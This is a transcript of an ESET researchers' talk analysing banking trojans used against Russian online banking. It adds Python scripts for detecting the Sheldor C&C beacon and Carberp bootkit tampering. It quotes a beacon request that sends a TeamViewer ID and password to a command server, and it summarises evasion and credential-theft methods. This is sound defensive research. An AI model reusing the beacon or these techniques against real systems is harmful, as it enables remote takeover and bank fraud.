Modern malware techniques for attacking RBS systems in Russia
Presentation Transcript

  • Modern malware techniques for attacking RBS systems in Russia. Aleksandr Matrosov, Eugene Rodionov
  • Who we are? Malware researchers at ESET:
    - complex threat analysis
    - development of cleaning tools
    - tracking new malware techniques
    - investigation of cybercrime groups
    http://www.joineset.com/
  • Agenda
    o Cybercrime trends in RBS
    o Most prevalent threats and incidents
      - Win32/Shiz
      - Win32/Hodprot
      - Win32/Sheldor
      - Win32/RDPdoor
      - Win32/Carberp
    o Carberp cybercrime group revenue
  • Overview: 2010/11, years of attacks on Russian banks
    - the number of incidents has more than doubled compared to 2010*
    - over 92%* of incidents involve banking trojans
    - malware tailored to Russian banks and payment systems
    However! It can be (and IS) used in other countries as well.
    * research report "The Russian cybercrime market in 2010: status and trends", http://www.group-ib.ru/wp-content/uploads/2011/04/Group-IB_Report_Russian-cybercrime-market_2010_eng.pdf
  • Interesting facts about Russian bank fraud: these guys are still free!
  • Evolution of RBS trojans
    o RBS Trojans 2009-2010:
      - Win32/Shiz (2009)
      - Win32/Carberp
      - Win32/Hodprot
      - Win32/Sheldor
      - Win32/RDPdoor
    o RBS Trojans 2011:
      - multiple updates
      - growing incident numbers
      - ….
      - Win32/Carberp with bootkit
  • Cybercrime landscape (2010)
  • Cybercrime landscape (2011)
  • Cybercrime landscape (2011)
  • Win32/Spy.Shiz
  • Win32/Spy.Shiz detection statistics by month (cloud data from Live Grid, August 2009 – November 2011)
  • Win32/Spy.Shiz detection statistics by country (cloud data from Live Grid)
  • Win32/Spy.Shiz: stealing money
  • Win32/Hodprot
  • Win32/Hodprot detection statistics by month (cloud data from Live Grid, July 2010 – November 2011)
  • Win32/Hodprot detection statistics by country (cloud data from Live Grid)
  • Win32/Hodprot: antiforensics (diagram of stored components: main module, original sfcfiles.dll, kernel driver image, loader code, C&C URLs)
  • Win32/Hodprot: injecting payload (diagram labels: Winlogon address space, browser address space, setupapi.dll, sfcfiles.dll, system registry, driver sfc.sys; user-mode / kernel-mode; assemble payload, inject payload, update payload, install & load)
  • Win32/Hodprot: C&C protocol (diagram)
    1. Win32/Hodprot -> C&C server: send request (bot ID, integer)
    2. C&C server: handle request
    3. C&C server -> Win32/Hodprot: reply with updated modules and image to execute
    4. Win32/Hodprot: update the bot's modules, run the downloaded executable
    5. Win32/Hodprot -> C&C server: send status information
  • Win32/Sheldor & Win32/RDPdoor
  • Win32/Sheldor and TeamViewer in action (diagram: TeamViewer cloud, infected computer running Win32/Sheldor, C&C)
    1. Request cloud ID
    2. Set cloud ID
    3. Send ID to C&C: GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1
    4. Malicious connection
  • Under the hood: DLL hooking (diagram: TeamViewer.exe, TV.dll (proxy DLL), TS.dll (original TS.dll))
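The beacon in step 3 is a concrete network indicator a defender can alert on: a GET to getinfo.php carrying a TeamViewer-style ID in `id`, plus `pwd` and `stat`. The following is an added detection example written for this page, not code from the slides or from ESET; the log format and the host name c2.example.invalid are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Beacon shape shown on the slide: GET /getinfo.php?id=<TeamViewer ID>&pwd=<password>&stat=<n>
BEACON_PATH = "/getinfo.php"
BEACON_PARAMS = {"id", "pwd", "stat"}
# TeamViewer IDs appear as three digit groups ("414 034 883"); parse_qs decodes the %20
TEAMVIEWER_ID = re.compile(r"^\d{3} \d{3} \d{3}$")

def parse_beacon(url):
    """Return {"teamviewer_id", "stat"} if the URL has the Sheldor beacon shape, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith(BEACON_PATH):
        return None
    query = parse_qs(parts.query)
    if not BEACON_PARAMS.issubset(query):
        return None
    tv_id = query["id"][0]
    if not TEAMVIEWER_ID.match(tv_id):
        return None
    return {"teamviewer_id": tv_id, "stat": query["stat"][0]}

def scan_proxy_log(lines):
    """Return one alert per beacon in constructed 'timestamp client method url status' lines."""
    alerts = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5 or fields[2] != "GET":
            continue
        beacon = parse_beacon(fields[3])
        if beacon:
            alerts.append({"client": fields[1], "host": urlsplit(fields[3]).hostname, **beacon})
    return alerts

# Constructed proxy log lines (not real traffic); the C&C host name is a placeholder
SAMPLE_LOG = [
    "2011-11-03T10:01:12 10.0.0.15 GET http://www.example.com/index.html 200",
    "2011-11-03T10:01:30 10.0.0.15 GET http://c2.example.invalid/getinfo.php?id=414%20034%20883&pwd=6655&stat=1 200",
    "2011-11-03T10:02:01 10.0.0.22 GET http://www.example.com/getinfo.php?id=abc&pwd=1&stat=1 404",
    "2011-11-03T10:02:40 10.0.0.22 POST http://www.example.com/login 302",
]

if __name__ == "__main__":
    for alert in scan_proxy_log(SAMPLE_LOG):
        print(alert)
```

A hit is worth correlating with the TeamViewer ID the infected host actually obtained from the TeamViewer cloud (steps 1 and 2), since the malware sends exactly that ID to the C&C.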
  • Malicious DLL call graph
  • Malicious DLL decompilation (annotated: functions for calling from original TS.dll, load original TS.dll, hook functions, C&C URL)
  • Sheldor C&C panel
  • Win32/RDPdoor installation (diagram: infected computer running Win32/RDPdoor, C&C)
    1. Run dropper and send system information
    2. Authentication on C&C; C&C provides Thinsoft BeTwin for installation
    3. Send status information
  • Stealing authentication data
    1. Install GINA extension DLL
    2. Display fake logon screen
    3. Capture user name & password
    4. Send to C&C
  • Win32/Carberp
  • Win32/Carberp detections over time in Russia (cloud data from Live Grid, January 2010 – November 2011)
  • Win32/Carberp detection statistics by country (cloud data from Live Grid)
  • Self-protecting functionality
    - Bypassing AV emulators: many calls of rare WinAPI functions
    - Code injection method: ZwQueueApcThread(), ZwResumeThread()
    - Unhooking method: checking the first bytes of the API function body and deleting hooks
    - Command and string encryption: custom encryption algorithm
    - Bot authentication on C&C: file with authentication data stored on the infected PC
    - Network communication encryption: base64( RC2(data) )
    - API function call obfuscation: custom hash algorithm
    - Detection of AV hooks: comparison of the first original bytes
    - Bypassing static AV signatures: appending random junk bytes to dropped files
    - Hiding in the system: hooking system functions; bootkit infector (September 2011)
  • Carberp going deeper since September 2011
  • Carberp going deeper since September 2011 (boot sequence)
    1. Load MBR (real mode)
    2. Load VBR (real mode)
    3. Load bootstrap code (real mode / protected mode): target of Rovnix & Carberp
    4. Load bootmgr (real mode / protected mode)
    5. Load winload.exe or winresume.exe (real mode / protected mode)
    6. Load kernel and boot start drivers
  • Carberp: infected partition layout
    o Carberp overwrites the bootstrap code of the active partition
    o The malicious driver is written either:
      - before the active partition, in case there is enough space
      - at the end of the hard drive, otherwise
    Diagram, before infecting: MBR | VBR | Bootstrap Code | File System Data
    Diagram, after infecting: MBR, VBR, Malicious Bootstrap Code, File System Data, Compressed Data (Malicious Unsigned Driver); NTFS bootstrap code (15 sectors)
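Because the bootkit modifies only the active partition's bootstrap code and parks its driver in otherwise unused sectors, both can be checked offline against a known-good image. The following is an added example for this page (not ESET's tool or the slides' code): it parses the MBR partition table, hashes the VBR plus the 15 bootstrap sectors of the active partition, and flags non-zero data in the gap between the MBR and the partition start. The 16-sector boot region and the constructed 32 KiB sample images are assumptions, not real disk dumps.

```python
import hashlib
import struct

SECTOR = 512
BOOT_SECTORS = 16  # VBR plus the 15 sectors of NTFS bootstrap code named on the slide (assumed contiguous)

def active_partition_lba(image):
    """Return the starting LBA of the active (bootable) MBR partition entry."""
    if image[510:512] != b"\x55\xaa":
        raise ValueError("MBR signature missing")
    for i in range(4):
        entry = image[446 + 16 * i:446 + 16 * (i + 1)]
        if entry[0] == 0x80:
            return struct.unpack_from("<I", entry, 8)[0]
    raise ValueError("no active partition")

def bootstrap_hash(image):
    """SHA-256 over the active partition's VBR and bootstrap code, for comparison with a baseline."""
    start = active_partition_lba(image) * SECTOR
    return hashlib.sha256(image[start:start + BOOT_SECTORS * SECTOR]).hexdigest()

def gap_has_data(image):
    """True if any sector between the MBR and the active partition is non-zero:
    the gap where the slide says the unsigned driver goes when there is enough space."""
    return any(image[SECTOR:active_partition_lba(image) * SECTOR])

def check_image(image, baseline_hash):
    """Two independent indicators of the infection described on the slide."""
    return {"bootstrap_modified": bootstrap_hash(image) != baseline_hash,
            "gap_has_data": gap_has_data(image)}

# --- constructed 64-sector sample images (not real disk dumps) ---
def build_image(part_lba=32, total=64, tamper=False, driver=False):
    img = bytearray(total * SECTOR)
    # one active NTFS-type (0x07) entry: status, CHS start, type, CHS end, LBA start, sector count
    struct.pack_into("<B3sB3sII", img, 446, 0x80, b"\0\0\0", 0x07, b"\0\0\0", part_lba, total - part_lba)
    img[510:512] = b"\x55\xaa"
    off = part_lba * SECTOR
    img[off:off + 11] = b"\xeb\x52\x90NTFS    "             # NTFS VBR jump + OEM ID
    img[off + SECTOR:off + 2 * SECTOR] = b"\xfa" * SECTOR  # stand-in for clean bootstrap code
    if tamper:   # bootkit overwrote the first bootstrap sector
        img[off + SECTOR:off + SECTOR + 4] = b"\x31\xc0\x8e\xd8"
    if driver:   # compressed driver dropped into the pre-partition gap
        img[4 * SECTOR:4 * SECTOR + 16] = b"MZ" + b"\x90" * 14
    return bytes(img)

CLEAN_IMAGE = build_image()
INFECTED_IMAGE = build_image(tamper=True, driver=True)
BASELINE = bootstrap_hash(CLEAN_IMAGE)   # taken from a trusted install of the same OS build

if __name__ == "__main__":
    print(check_image(CLEAN_IMAGE, BASELINE))     # both False
    print(check_image(INFECTED_IMAGE, BASELINE))  # both True
```

On a real system the baseline must come from a clean machine with the same Windows version and partition type, since legitimate bootstrap code differs between builds; the end-of-disk variant needs the same non-zero scan applied to sectors after the last partition.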
  • Interesting strings and investigation
  • Win32/Carberp: money stealing methods (stealing technique: functionality)
    - Web-injects/Autoloads (IE, FF, Chrome, Opera): inserting the specified JS code into the HTML returned by the online banking site
    - Backconnect backdoor (RDP/VNC): loading a special binary module on request (RDPdoor, custom VNC client)
    - Keylogger (based on WinAPI): recording keyboard events into a log file
    - ScreenSpy (based on WinAPI): saving screenshots into a log file
    - Grabbers (Form, FTP, Pass): loading a special binary module on request
    - Custom plugins for RBS: binary modules for specified RBS (sber.plug)
  • Win32/Carberp botnet control panel
  • C&C with stolen data
  • Cab-files with stolen data
  • Stolen data: BS-Client IB system
  • Stolen data: CyberPlat payment system
  • Stolen data: iBank IB system
  • Stolen data: SberBank IB
  • Stolen data: UkrSibBank IB
  • References
    - "Cybercrime in Russia: Trends and issues", http://go.eset.com/us/resources/white-papers/CARO_2011.pdf
    - "Evolution of Win32/Carberp: going deeper", http://blog.eset.com/2011/11/21/evolution-of-win32carberp-going-deeper
    - "Hodprot: Hot to Bot", http://go.eset.com/us/resources/white-papers/Hodprot-Report.pdf
    Follow the ESET Threat Blog: http://blog.eset.com
  • Questions
  • Thank you for your attention ;) Aleksandr Matrosov, matrosov@eset.sk, @matrosov; Eugene Rodionov, rodionov@eset.sk, @vxradius